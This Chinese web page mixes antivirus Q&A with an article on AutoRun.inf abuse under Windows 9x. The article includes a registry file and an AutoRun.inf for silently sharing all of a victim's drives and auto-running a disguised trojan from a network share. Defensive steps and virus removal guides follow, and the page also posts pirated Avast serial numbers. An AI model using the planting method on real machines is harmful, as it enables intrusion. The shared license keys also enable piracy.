建鄴區(qū)急回: ______ 電腦中毒分很簡單的兩部進(jìn)行啦: 1、安裝殺毒軟件殺毒(其實(shí)毒一般是殺不了的,只能隔離)也可以用專殺軟件殺毒. 2、如果電腦還出現(xiàn)問題,只有格C盤,把自己有用的東西存在D盤或者其他盤里.格C盤的意思也就是把C盤的東西全部刪除,重新再裝一遍系統(tǒng),這也是最徹底的殺毒方法了.
直惠19483123498: 電腦中毒了,有什么徹底的方法沒?
建鄴區(qū)急回: ______ 對于特殊的一些不能刪除的病毒或流氓軟件 可以采用一些非正常方法,如網(wǎng)上介紹的采用映象劫持的方法,讓部分文件不能正常加載運(yùn)行,然后再刪除之.還可以使用U盤啟動PE系統(tǒng),找到病毒文件,刪除之也可以 :) 這里大家可以充分展開...
直惠19483123498: 電腦中毒了 我現(xiàn)在解不了 怎么辦
建鄴區(qū)急回: ______ 用電腦管家或者安全衛(wèi)士等工具進(jìn)行查殺或者重新安裝系統(tǒng).
直惠19483123498: 電腦中毒被設(shè)置了密碼怎么解開 -
建鄴區(qū)急回: ______ 親,電腦中毒了被病毒黑客設(shè)置密碼這個(gè)千萬不要加內(nèi)中黑客給錢,建議親重做系統(tǒng),做完系統(tǒng)后立刻下載騰訊電腦管家徹底殺毒,然后看是否還有殘留插件也卸載粉碎,最后開啟防火墻.我給親推薦下載安裝騰訊電腦管家來進(jìn)行解決,打開殺...
直惠19483123498: 怎么解電腦病毒
建鄴區(qū)急回: ______ 我個(gè)人的建議啊 希望對你有所幫助電腦中毒了啊 殺毒軟件是很難把電腦病毒殺徹底的啊 而且你的殺毒軟件很容易被病毒破壞而不能用 而且現(xiàn)在的病毒有好多都是免殺的 你最好的辦法是把你的電腦系統(tǒng)重新裝一下系統(tǒng) 還有就是要把其他的盤中...
直惠19483123498: 關(guān)于電腦中毒的問題要怎么解決啊
建鄴區(qū)急回: ______ 其實(shí)你這種情況最好的方法就是重新做系統(tǒng),雖然說也許可以有能在先查殺的軟件幫助你查掉病毒,但是你電腦有很多東西都被更改,你在繼續(xù)適用也是給自己找麻煩.重做系統(tǒng)是個(gè)好的選擇!
直惠19483123498: 如何解決電腦中毒問題?
建鄴區(qū)急回: ______ 我的電腦中毒了,殺毒軟件、360和專殺工具只要一打開就會自動關(guān)閉 估計(jì)是中了AV終結(jié)者或類似木馬 一.中毒現(xiàn)象 病毒在移動設(shè)備或硬盤根目錄下生成Autorun.inf文件,用戶雙擊盤符即可激活病毒 關(guān)閉眾多殺毒軟件和安全工具 修改注冊表,...
直惠19483123498: 我的電腦中毒怎么辦 -
建鄴區(qū)急回: ______ 中毒了,先斷開網(wǎng)線. 如果能正常啟動的話,用殺毒軟件和安全衛(wèi)士360之類的軟件全盤殺毒. 如果還有這種問題的話,在進(jìn)入安全模式下再殺一遍,一般都可以解決這種問題! 如果不能啟動,那就只好重裝系統(tǒng)了. 或者拆下硬盤,到別的電腦上去殺毒,但要注意主從跳線的選擇! 最后最好裝上防火墻和殺毒軟件,下載資源時(shí)小心些!
一、理論基礎(chǔ)
經(jīng)常使用光盤的朋友都知道,有很多光盤放入光驅(qū)就會自動運(yùn)行,它們是怎么做的呢?光盤一放入光驅(qū)就會自動被執(zhí)行,主要依靠兩個(gè)文件,一是光盤上的AutoRun.inf文件,另一個(gè)是操作系統(tǒng)本身的系統(tǒng)文件之一的Cdvsd.vxd。Cdvsd.vxd會隨時(shí)偵測光驅(qū)中是否有放入光盤的動作,如果有的話,便開始尋找光盤根目錄下的AutoRun.inf文件。如果存在AutoRun.inf文件則執(zhí)行它里面的預(yù)設(shè)程序。
AutoRun.inf不光能讓光盤自動運(yùn)行程序,也能讓硬盤自動運(yùn)行程序,方法很簡單,先打開記事本,然后用鼠標(biāo)右鍵點(diǎn)擊該文件,在彈出菜單中選擇“重命名”,將其改名為AutoRun.inf,在AutoRun.inf中鍵入以下內(nèi)容:
[AutoRun] //表示AutoRun部分開始,必須輸入
Icon=C:\C.ico //給C盤一個(gè)個(gè)性化的盤符圖標(biāo)C.ico
Open=C:\1.exe //指定要運(yùn)行程序的路徑和名稱,在此為C盤下的1.exe
保存該文件,按F5刷新桌面,再看“我的電腦”中的該盤符(在此為C盤),你會發(fā)現(xiàn)它的磁盤圖標(biāo)變了,雙擊進(jìn)入C盤,還會自動播放C盤下的1.exe文件!
解釋一下:“[AutoRun]”行是必須的固定格式,“Icon”行對應(yīng)的是圖標(biāo)文件,“C:\C.ico”為圖標(biāo)文件路徑和文件名,你在輸入時(shí)可以將它改為你的圖片文件所在路徑和文件名。另外,“.ico”為圖標(biāo)文件的擴(kuò)展名,如果你手頭上沒有這類文件,可以用看圖軟件ACDSee將其他格式的軟件轉(zhuǎn)換為ico格式,或者找到一個(gè)后綴名為BMP的文件,將它直接改名為ICO文件即可。
“Open”行指定要自動運(yùn)行的文件及其盤符和路徑。要特別說明的是,如果你要改變的硬盤跟目錄下沒有自動播放文件,就應(yīng)該把“OPEN”行刪掉,否則就會因?yàn)檎也坏阶詣硬シ盼募虿婚_硬盤,此時(shí)只能用鼠標(biāo)右鍵單擊盤符在彈出菜單中選“打開”才行。
請大家注意:保存的文件名必須是“AutoRun.inf”,編制好的Autorun.inf文件和圖標(biāo)文件一定要放在硬盤根目錄下。更進(jìn)一步,如果你的某個(gè)硬盤內(nèi)容暫時(shí)比較固定的話,不妨用Flash做一個(gè)自動播放文件,再編上“Autorun”文件,那你就有最酷、最個(gè)性的硬盤了。
到這兒還沒有完。大家知道,在一些光盤放入后,我們在其圖標(biāo)上單擊鼠標(biāo)右鍵,還會產(chǎn)生一個(gè)具有特色的目錄菜單,如果能對著我們的硬盤點(diǎn)擊鼠標(biāo)右鍵也產(chǎn)生這樣的效果,那將更加的有特色。其實(shí),光盤能有這樣的效果也僅僅是因?yàn)樵贏utoRun.inf文件中有如下兩條語句:
shell\標(biāo)志=顯示的鼠標(biāo)右鍵菜單中內(nèi)容
shell\標(biāo)志\command=要執(zhí)行的文件或命令行
所以,要讓硬盤具有特色的目錄菜單,在AutoRun.inf文件中加入上述語句即可,示例如下:
shell\1=天若有情天亦老
shell\1\command\=notepad ok.txt
保存完畢,按F5鍵刷新,然后用鼠標(biāo)右鍵單擊硬盤圖標(biāo),在彈出菜單中會發(fā)現(xiàn)“天若有情天亦老”(圖1),點(diǎn)擊它,會自動打開硬盤中的“ok.txt”文件。注意:上面示例假設(shè)“ok.txt”文件在硬盤根目錄下,notepad為系統(tǒng)自帶的記事本程序。如果要執(zhí)行的文件為直接可執(zhí)行程序,則在“command\”后直接添加該執(zhí)行程序文件名即可。
圖 1
二、實(shí)例
下面就舉個(gè)例子:如果你掃到一臺開著139共享的機(jī)器,而對方只完全共享了D盤,我們要讓對方的所有驅(qū)動器都共享。首先編輯一個(gè)注冊表文件,打開記事本,鍵入以下內(nèi)容:
REGEDIT4
'此處一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
以上我只設(shè)置到E盤,如果對方有很多邏輯盤符的請自行設(shè)置。將以上部分另存為Share.reg文件備用。要特別注意REGEDIT4為大寫且頂格書寫,其后要空上一行,在最后一行記得要按一次回車鍵。
然后打開記事本,編制一個(gè)AutoRun.inf文件,鍵入以下內(nèi)容:
[AutoRun]
Open=regedit/s Share.reg //加/s參數(shù)是為了導(dǎo)入時(shí)不會顯示任何信息
保存AutoRun.inf文件。將Share.reg和AutoRun.inf這兩個(gè)文件都復(fù)制到對方的D盤的根目錄下,這樣對方只要雙擊D盤就會將Share.reg導(dǎo)入注冊表,這樣對方電腦重啟后所有驅(qū)動器就會都完全共享出來。
如果想讓對方中木馬,只要在AutoRun.inf文件中,把“Open=Share.Reg”改成“Open=木馬服務(wù)端文件名”,然后把AutoRun.inf和配置好的木馬服務(wù)端一起復(fù)制到對方D盤的根目錄下,這樣不需對方運(yùn)行木馬服務(wù)端程序,而只需他雙擊D盤就會使木馬運(yùn)行!這樣做的好處顯而易見,那就是大大的增加了木馬運(yùn)行的主動性!須知許多人現(xiàn)在都是非常警惕的,不熟悉的文件他們輕易的不會運(yùn)行,而這種方法就很難防范了。
要說明的是,給你下木馬的人不會那么蠢的不給木馬加以偽裝,一般說來,他們會給木馬服務(wù)端文件改個(gè)名字,或好聽或和系統(tǒng)文件名很相像,然后給木馬換個(gè)圖標(biāo),使它看起來像TXT文件、ZIP文件或圖片文件等,,最后修改木馬的資源文件使其不被殺毒軟件識別(具體的方法可以看本刊以前的文章),當(dāng)服務(wù)端用戶信以為真時(shí),木馬卻悄悄侵入了系統(tǒng)。其實(shí),換個(gè)角度理解就不難了——要是您給別人下木馬我想你也會這樣做的。以上手段再輔以如上內(nèi)容的AutoRun.inf文件就天衣無縫了!
三、防范方法
共享分類完全是由flags標(biāo)志決定的,它的鍵值決定了共享目錄的類型。當(dāng)flags=0x302時(shí),重新啟動系統(tǒng),目錄共享標(biāo)志消失,表面上看沒有共享,實(shí)際上該目錄正處于完全共享狀態(tài)。網(wǎng)上流行的共享蠕蟲,就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可以看到硬盤被共享了,明白了嗎?秘密就在這里!
以上代碼中的Parmlenc、Parm2enc屬性項(xiàng)是加密的密碼,系統(tǒng)在加密時(shí)采用了8位密碼分別與“35 9a 4b a6 53 a9 d4 6a”進(jìn)行異或運(yùn)算,要想求出密碼再進(jìn)行一次異或運(yùn)算,然后查ASCII表可得出目錄密碼。在網(wǎng)絡(luò)軟件中有一款軟件就利用該屬性進(jìn)行網(wǎng)絡(luò)密碼破解的,在局域網(wǎng)內(nèi)從一臺機(jī)器上可以看到另一臺計(jì)算機(jī)的共享密碼。
利用TCP/IP協(xié)議設(shè)計(jì)的NethackerⅡ軟件可以穿過Internet網(wǎng)絡(luò),找到共享的主機(jī),然后進(jìn)行相應(yīng)操作。所以當(dāng)您通過Modem上網(wǎng)時(shí),千萬要小心,因?yàn)橐徊恍⌒模闹鳈C(jī)將完全共享給對方了。
解決辦法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等刪掉。然后刪除windows\system\下面的Vserver.vxd刪除,它是Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享虛擬設(shè)備驅(qū)動程序,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver鍵值刪掉,就會很安全了。
另外,關(guān)閉硬盤AutoRun功能也是防范黑客入侵的有效方法之一。具體方法是在“開始”菜單的“運(yùn)行”中輸入Regedit,打開注冊表編輯器,展開到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer主鍵下,在右側(cè)窗格中找到“NoDriveTypeAutoRun”,就是這個(gè)鍵決定了是否執(zhí)行CDROM或硬盤的AutoRun功能。
雙擊“NoDriveTypeAutoRun”,在默認(rèn)狀態(tài)下(即你沒有禁止過AutoRun功能),在彈出窗口中可以看到“NoDriveTypeAutoRun”默認(rèn)鍵值為95,00,00,00,如圖所示(圖2)。其中第一個(gè)值“95”是十六進(jìn)制值,它是所有被禁止自動運(yùn)行設(shè)備的和。將“95”轉(zhuǎn)為二進(jìn)制就是10010101,其中每位代表一個(gè)設(shè)備,Windows中不同設(shè)備會用如下數(shù)值表示:
圖 2
設(shè)備名稱 第幾位 值 設(shè)備用如下數(shù)值表示 設(shè)備名稱含義
DKIVE_UNKNOWN 0 1 01h 不能識別的設(shè)備類型
DRIVE_NO_ROOT_DIR 1 0 02h 沒有根目錄的驅(qū)動器(Drive without root directory)
DRIVE_REMOVABLE 2 1 04h 可移動驅(qū)動器(Removable drive)
DRIVE_FIXED 3 0 08h 固定的驅(qū)動器(Fixed drive)
DRIVE_REMOTE 4 1 10h 網(wǎng)絡(luò)驅(qū)動器(Network drive)
DRIVE_CDROM 5 0 20h 光驅(qū)(CD-ROM)
DRIVE_RAMDISK 6 0 40h RAM磁盤(RAM Disk)
保留 7 1 80h 未指定的驅(qū)動器類型(Not yet specified drive disk)
在上面所列的表中值為“0”表示設(shè)備運(yùn)行,值為“1”表示該設(shè)備不運(yùn)行(默認(rèn)情況下,Windows禁止80h、10h、4h、01h這些設(shè)備自動運(yùn)行,這些數(shù)值累加正好是十六進(jìn)制的95h,所以NoDriveTypeAutoRun”默認(rèn)鍵值為95,00,00,00)。
由上面的分析不難看出,在默認(rèn)情況下,會自動運(yùn)行的設(shè)備是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK這四個(gè)保留設(shè)備,所以要禁止硬盤自動運(yùn)行AutoRun.inf文件,就必須將DRIVE_FIXED的值設(shè)為1,這是因?yàn)镈RIVE_FIXED代表固定的驅(qū)動器,即硬盤。這樣一來,原來的10010101(在表中“值”列中由下向上看)就變成了二進(jìn)制的10011101,轉(zhuǎn)為十六進(jìn)制為9D。現(xiàn)在,將“NoDriveTypeAutoRun”的鍵值改為9D,00,00,00后關(guān)閉注冊表編輯器,重啟電腦后就會關(guān)閉硬盤的AutoRun功能。
如果你看明白了,那你肯定知道該怎樣禁止光盤AutoRun功能了,對!就是將DRIVE_CDROM設(shè)為1,這樣“NoDriveTypeAutoRun”鍵值中的第一個(gè)值就變成了10110101,也就是十六進(jìn)制的B5。將第一個(gè)值改為B5后關(guān)閉注冊表編輯器,重啟電腦后就會關(guān)閉CDROM的Autorun功能。如果僅想禁止軟件光盤的AutoRun功能,但又保留對CD音頻碟的自動播放能力,這時(shí)只需將“NoDriveTypeAutoRun”的鍵值改為:BD,00,00,00即可。
如果想要恢復(fù)硬盤或光驅(qū)的AutoRun功能,進(jìn)行反方向操作即可。
事實(shí)上,大多數(shù)的硬盤根目錄下并不需要AutoRun.inf文件來運(yùn)行程序,因此我們完全可以將硬盤的AutoRun功能關(guān)閉,這樣即使在硬盤根目錄下有AutoRun.inf這個(gè)文件,Windows也不會去運(yùn)行其中指定的程序,從而可以達(dá)到防止黑客利用AutoRun.inf文件入侵的目的。
除此以外,我們還應(yīng)讓W(xué)indows能顯示出隱藏的共享。大家都知道,在Windows 9X中設(shè)置共享時(shí),通過在共享名后加上“$”這個(gè)符號,可使共享隱藏。比如,我們給一個(gè)名為share的計(jì)算機(jī)的C盤設(shè)置共享時(shí),只要將其共享名設(shè)為C$。這樣我們將看不到被共享的C盤,只有通過輸入該共享的確切路徑,才能訪問此共享。不過我們只要用將電腦中的msnp32.dll文件稍做修改。就可以讓W(xué)indows顯示出隱藏的共享。
由于在Windows下msnp32.dll會被調(diào)用,不能直接修改此文件,所以第一步我們要復(fù)制msnp32.dll到C盤下并改名為msnp32,msnp32.dll在C:\Windows\system文件夾下。運(yùn)行UltraEdit等十六進(jìn)制文件編輯器打開msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0處),找到后將“24”改為“00”,然后保存,關(guān)閉UltraEdit。重啟計(jì)算機(jī)進(jìn)入DOS模式,在命令提示符下輸入copy c:\msnp32.dll c:\Windows\system\msnp32.dll,重啟進(jìn)入Windows,現(xiàn)在雙擊share就能看見被隱藏的共享了。
最后要提醒大家利用TCP/IP協(xié)議設(shè)計(jì)的NethackerⅡ等黑客軟件可以穿過Internet網(wǎng)絡(luò),找到共享的主機(jī),然后進(jìn)行相應(yīng)操作。所以當(dāng)您通過Modem上網(wǎng)時(shí),千萬要小心,因?yàn)橐徊恍⌒模闹鳈C(jī)將完全共享給對方了。防范這類事情發(fā)生的方法無非是經(jīng)常檢查系統(tǒng),給系統(tǒng)打上補(bǔ)丁,經(jīng)常使用反黑殺毒軟件,上網(wǎng)時(shí)打開防火墻,注意異常現(xiàn)象,留意AutoRun.inf文件的內(nèi)容,關(guān)閉共享或不要設(shè)置為完全共享,且加上復(fù)雜的共享密碼。
我以前就是這樣解決的
置于防范方法,我用的是kv,下載升級包升級.不用去注冊
如果這樣還是搞不定的話,用在線殺毒,查出這個(gè)病毒的名字 再到各殺毒軟件的病毒庫尋找手動解決的方法,或者直接在百度上搜,不需要改動注冊表的方法應(yīng)為這樣需要時(shí)間的抓緊,在程序未執(zhí)行以前搞定,而高級的木馬都會有多個(gè)修復(fù)文件的備份文件.一定要找到全部殺除的方法,如果系統(tǒng)在殺除后不能使用,就重裝吧,反正殺了毒了.
給你一個(gè)在線殺毒網(wǎng)
http://www.viruschina.com/include/mfzxsd.asp
最好用雅虎助手或者windows優(yōu)化大師終止病毒進(jìn)程(注意多個(gè)進(jìn)程),
問:打開我的電腦、雙擊盤符不能能打開,但是用右鍵菜單的“打開”命令可以打開,有時(shí)還出來一個(gè)對話框說“windows無法找到command.exe。打開“文件”類型需要該程序”,并且讓我找磁盤下的文件,我在windows文件夾下找到這個(gè)文件后,每次雙擊都會打開一個(gè)dos的窗口。請問這是怎么回事?
答:這有可能是因?yàn)槟銠C(jī)器中過病毒,殺毒之后的結(jié)果。這種病毒在每個(gè)驅(qū)動器下都有一個(gè)卷標(biāo)AutoRun.inf文件,只要你雙擊驅(qū)動器,就會激活病毒,我們需要手工來刪除AutoRun.inf這個(gè)文件,在“命令提示符”下輸入“attrib
autorun.inf -s -h -r”去掉它的“系統(tǒng)”、“只讀”、“隱藏”屬性,這樣輸入“del
autorun.inf”才可以刪除。接著進(jìn)入注冊表查找“COMMAND.EXE”鍵值項(xiàng),找到后將整個(gè)shell子鍵刪除。
解決的具體方法如下(以D盤為例):
開始---運(yùn)行---cmd(打開命令提示符)
D: dir /a (沒有參數(shù)A是看不到的,A是顯示所有的意思)
此時(shí)你會發(fā)現(xiàn)一個(gè)autorun.inf文件,
attrib autorun.inf -s -h -r 去掉autorun.inf文件的系統(tǒng)、只讀、隱藏屬性,否則無法刪除 autorun.inf ,
del autorun.inf
到這里還沒完,因?yàn)槟汶p擊了D盤盤符沒有打開卻得到一個(gè)錯(cuò)誤。要求定位DESKTOP.exe,
這個(gè)時(shí)候自動運(yùn)行的信息已經(jīng)加入注冊表了。下面清除注冊表中相關(guān)信息:
開始
運(yùn)行
regedit
編輯
查找
DESKTOP.exe
找到的第一個(gè)就是D盤的自動運(yùn)行,刪除整個(gè)shell子鍵
完畢.
重復(fù)以上操作數(shù)次,解決其他驅(qū)動器的問題,注冊表中的信息是在一起的,在刪除D盤
Shell\Open\Autorun的時(shí)候順便都刪除了吧。
推薦我現(xiàn)在使用的殺毒軟件,個(gè)人認(rèn)為是目前最強(qiáng)的殺軟
現(xiàn)在網(wǎng)上最火的殺軟AVAST中文版(世界排名十二)
在歐洲被稱為唯一能與NOD32媲美的殺軟avast4.7官方中文專業(yè)版
推薦用迅雷下載
http://www.3k16.com/ruanjian/UploadFiles_7827/200605/avast4.7%B9%D9%B7%BD%D6%D0%CE%C4%D7%A8%D2%B5%B0%E6.rar
序列號:
S6039686R6039W1106-FBYVE2MU 有效期2009.5.6
升級有效期2010.1.1
S7935192R4371Z1106-S1BJD5AJ 有效期2012.1.6
升級有效期2008.8.1
S6945137R6826L1106-WXH4K1SJ 有效期2008.4.6
升級有效期2010.9.
來自捷克的AVAST,已有17年的歷史,但最近才在我們這里興起,它在國外市場一直處于領(lǐng)先地位。Avast!的實(shí)時(shí)監(jiān)控功能十分強(qiáng)大!它擁有七大防護(hù)模塊:網(wǎng)絡(luò)防火墻防護(hù)、標(biāo)準(zhǔn)的本地文件讀取防護(hù)、網(wǎng)頁防護(hù)、即時(shí)通訊軟件防護(hù)、郵件收發(fā)防護(hù)、P2P軟件防護(hù)。這么完善的防護(hù)系統(tǒng),定能讓你的系統(tǒng)練就一副金剛不壞之身!任意開啟各項(xiàng)保護(hù)模塊能夠查殺流氓軟件,比如3721。升級很人性化Avast是捷克一家軟件公司(ALWIL Software)的產(chǎn)品。ALWIL 軟件公司的研發(fā)機(jī)構(gòu)在捷克的首都-布拉格,現(xiàn)在他們和世界上許多國家的安全軟件機(jī)構(gòu)都有良好的合作關(guān)系。早在80年代末ALWIL公司的安全軟件已經(jīng)獲得良好的市場占有率,但當(dāng)時(shí)僅限于捷克地區(qū)。ALMIL公司是擅長于安全軟件方面的研發(fā),開發(fā)的Avast Antivirus系列是他們的拳頭產(chǎn)品,Avast在許多重要的市場和權(quán)威評獎中都取得了驕人的成績,同樣在此后進(jìn)軍國際市場上也贏得了良好的增長率。
主要特點(diǎn):
(1)高偵測的反病毒表現(xiàn),多次獲得過ICSA和VirusBulletin 100%認(rèn)證,啟發(fā)式強(qiáng)大。
(2)較低的內(nèi)存占用和直觀,簡潔的使用界面。
(3)支持SKIN更換,完善的程序內(nèi)存檢測
(4)對SMTP/POP3/IMAP郵件收發(fā)監(jiān)控的全面保護(hù)。
(5)支持MS OUTLOOK外掛,智能型郵件帳號分析。
(6)支持宏病毒文檔修復(fù),修復(fù)檔案后自動產(chǎn)生病毒還原數(shù)據(jù)庫(VRDB功能)。
(7)支持P2P共享下載軟件和即時(shí)通訊病毒檢測,保護(hù)全面。
(8)良好有效的偵測并清除病毒,如蟲,廣告和木馬程序
(9)病毒庫更新速度快,對新型病毒和木馬有迅捷的反應(yīng)。
功能特性如下:
*反病毒內(nèi)核
*自動升級
*簡單的使用界面
*病毒隔離區(qū)
*實(shí)時(shí)監(jiān)控
*系統(tǒng)結(jié)合
*P2P和聊天軟件監(jiān)控保護(hù)
*病毒清除
*網(wǎng)絡(luò)防護(hù)
*64位系統(tǒng)支持
*網(wǎng)頁防護(hù)
*多國語言支持
*增強(qiáng)型用戶界面
*惡意腳本屏蔽 *DOS下掃描
*擴(kuò)展病毒庫升級 *移除病毒備份
占用內(nèi)存不到25兆,讓你老機(jī)器也流暢
WOW木馬
1.結(jié)束病毒的進(jìn)程%Windows%\smss.exe
2.刪除相關(guān)文件:
C:\MSCONFIG.SYS
%Windows%\1.com
%Windows%\ExERoute.exe
%Windows%\explorer.com
%Windows%\finder.com
%Windows%\smss.exe
%Windows%\Debug\DebugProgram.exe
%System%\command.pif
%System%\dxdiag.com
%System%\finder.com
%System%\MSCONFIG.COM
%System%\regedit.com
%System%\rundll32.com
%ProgramFiles%\InternetExplorer\iexplore.com
%ProgramFiles%\CommonFiles\iexplore.pif
3.恢復(fù)EXE文件關(guān)聯(lián)
刪除[HKEY_CLASSES_ROOT\winfiles]項(xiàng)
4.刪除病毒啟動項(xiàng):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TorjanProgram"="%Windows%\smss.exe"
修改[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]下
"shell"="Explorer.exe1"
為
"shell"="Explorer.exe"
5.恢復(fù)病毒修改的注冊表信息:
(1)分別查找“command.pif”、“finder.com”、“rundll32.com”的信息,將“command.pif”、“finder.com”、“rundll32.com”修改為“rundll32.exe”
(2)查找“explorer.com”的信息,將“explorer.com”修改為“explorer.exe”
(3)查找“iexplore.com”的信息,將“iexplore.com”修改為“iexplore.exe”
(4)查找“iexplore.pif”的信息,將找到的“%ProgramFiles%\CommonFiles\iexplore.pif”修改為“%ProgramFiles%\InternetExplorer\iexplore.exe”
在注冊表編輯器中定位到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon”,編輯右邊“Shell”的內(nèi)容,修改為“Explorer.exe”。
樓主好運(yùn)
染上了lsass病毒,顯示發(fā)現(xiàn)d盤下面無故多了兩個(gè)文件:autorun.inf,和command.com文件,刪了,過一會兒又出現(xiàn)了。然后發(fā)現(xiàn)用戶進(jìn)程多了一個(gè)LSASS.exe,并且用進(jìn)程管理工具結(jié)束不了,提示為系統(tǒng)進(jìn)程無法結(jié)束,初步懷疑中招了。
關(guān)鍵字lsass.exe百度一下,發(fā)現(xiàn)有說lsass.exe病毒的詞條,點(diǎn)開發(fā)現(xiàn)里面描述的癥狀跟我的一模一樣,但是我還沒有發(fā)現(xiàn)該病毒對我的電腦造成什么破壞,我系統(tǒng)原本啟動之后的進(jìn)程:
呵呵,被我優(yōu)化了,后來有了一個(gè)就是上面LSASS.exe進(jìn)程,很不爽。
解決方法:登錄瑞星在線殺毒網(wǎng)站,在線殺毒,之前我用的是卡巴斯基,名氣很大,好像不怎么殺毒,我就把卡巴斯基的監(jiān)控進(jìn)程給關(guān)掉了,只留下卡巴斯基的守護(hù)進(jìn)程kavsvc.exe。瑞星在線殺毒確實(shí)不錯(cuò)(強(qiáng)烈支持),卡巴斯基掃描了好幾次系統(tǒng),每次的結(jié)果都是查毒結(jié)果:病毒0,瑞星在線殺毒使用了一下,不錯(cuò)查到了:
然后看看網(wǎng)上的其他的參考資料,還要把如下硬盤中的文件:
c:\program files\common files\INTEXPLORE.pifc:\program files\internet explorer\INTEXPLORE.com%SYSTEM\debug\debugprogram.exe%SYSTEM\system32\Anskya0.exe%SYSTEM\system32\dxdiag.com%SYSTEM\system32\MSCONFIG.com%SYSTEM\system32\regedit.com%SYSTEM\system32\LSASS.exe%SYSTEM\system32\EXERT.exe
刪除。照著上面做,果然好了,好了,不寫了,實(shí)驗(yàn)室要關(guān)門了,下次。
ps:看到很多朋友都很關(guān)注這偏文章,有人反映還是解決不了問題,我覺得可能寫的不夠詳細(xì),條理可能不夠清楚,特補(bǔ)充一點(diǎn),希望能給大家解難。
碰到這個(gè)問題,建議可以采取下列步驟:
中招癥狀
癥狀一:打開windows任務(wù)管理器,發(fā)現(xiàn)若用戶進(jìn)程中有LSASS.exe進(jìn)程,而非系統(tǒng)進(jìn)程,系統(tǒng)進(jìn)程中其實(shí)也有一個(gè)lsass.exe進(jìn)程,次進(jìn)程非彼進(jìn)程。一個(gè)是系統(tǒng)進(jìn)程,屬于操作系統(tǒng)為用戶提供服務(wù)所必須的進(jìn)程,一個(gè)是用戶進(jìn)程,屬于用戶運(yùn)行的程序。所謂用戶進(jìn)程和系統(tǒng)進(jìn)程的區(qū)別:可以看任務(wù)管理器任務(wù)中的User name列,該列是System的就是系統(tǒng)進(jìn)程,一般是操作系統(tǒng)的進(jìn)程,或者是其他軟件的守護(hù)進(jìn)程,如kavsvc.exe就是卡巴斯基的守護(hù)進(jìn)程。User name列是你windows系統(tǒng)登錄的用戶名的就是用戶進(jìn)程,有的朋友用Administrator用戶登錄,則任務(wù)管理器的進(jìn)程選項(xiàng)卡中的User name列中是Administrator的就是用戶進(jìn)程,如下圖中的UltraCapture.exe(截圖軟件的進(jìn)程),taskmgr.exe(任務(wù)管理器的進(jìn)程), explorer.exe(資源管理器,打開我的電腦等單獨(dú)啟動的一個(gè)進(jìn)程,有的用戶該進(jìn)程是合在系統(tǒng)的explorer.exe中的)都是用戶進(jìn)程,其他的都是系統(tǒng)進(jìn)程。
癥狀二:d盤的根目錄下面有兩個(gè)文件:autorun.inf和command.com,其中command.com是隱藏屬性的。
雖然該病毒,暫時(shí)沒有對明顯的占用系統(tǒng)資源,或者破壞系統(tǒng),破壞文件之類的。但是卻存在著潛在的危險(xiǎn)。
解決方法
步驟一:在運(yùn)行框中輸入msconfig命令,選擇啟動項(xiàng)選項(xiàng)卡,取消LSASS.exe隨系統(tǒng)啟動的選項(xiàng)。
步驟二:刪除系統(tǒng)中的如下病毒文件,有的文件可能提示無法刪除,不過沒有關(guān)系,先刪除其它的,然后重啟windows,再去刪除剩下的幾個(gè)剛才沒有刪除的,這回應(yīng)該是可以了。
c:\program files\common files\INTEXPLORE.pifc:\program files\internet explorer\INTEXPLORE.com%SYSTEM\debug\debugprogram.exe%SYSTEM\system32\Anskya0.exe%SYSTEM\system32\dxdiag.com%SYSTEM\system32\MSCONFIG.com%SYSTEM\system32\regedit.com%SYSTEM\system32\LSASS.exe%SYSTEM\system32\EXERT.exe
步驟三:啟動殺毒軟件殺毒,進(jìn)行全盤掃描。好像卡巴斯基不怎么管用,用瑞星或者是金山毒霸應(yīng)該是可以的。
步驟四:殺完毒后,重啟windows就基本ok了。
另外:如果發(fā)現(xiàn),有的.exe程序無法運(yùn)行,且出來一個(gè)選擇打開程序的列表框,新建一個(gè)reg文件,輸入如下內(nèi)容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe] @="exefile" "Content Type"="%1,%*" [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\PersistentHandler] @="{098f2470-bae0-11cd-b579-08002b30bfeb}"
然后允許該注冊表添加文件即可。
1、我也中過這個(gè)病毒,重裝系統(tǒng)后過幾天會再產(chǎn)生的。
這應(yīng)該是種winfile病毒。
LSASS.EXE為正常的系統(tǒng)進(jìn)程,而LSASS.exe為病毒進(jìn)程。
2、原因應(yīng)該是:
該病毒修改注冊表啟動RUN鍵值,指向LSASS.exe,修改HKEY_CLASSES_ROOT下的.exe,exefile鍵值,并新建windowfile鍵值。將exe文件打開鏈接關(guān)聯(lián)到其生成的病毒程序%SYSTEM\EXERT.exe上。
3、殺毒方法:
使用winpe光盤啟動,如 深山紅葉
找到并刪除上述文件,并使用搜索功能,查找全部硬盤文件大小在41KB到43KB之間的所有文件,在結(jié)果中查看并刪除大小為42.02KB的所有文件。
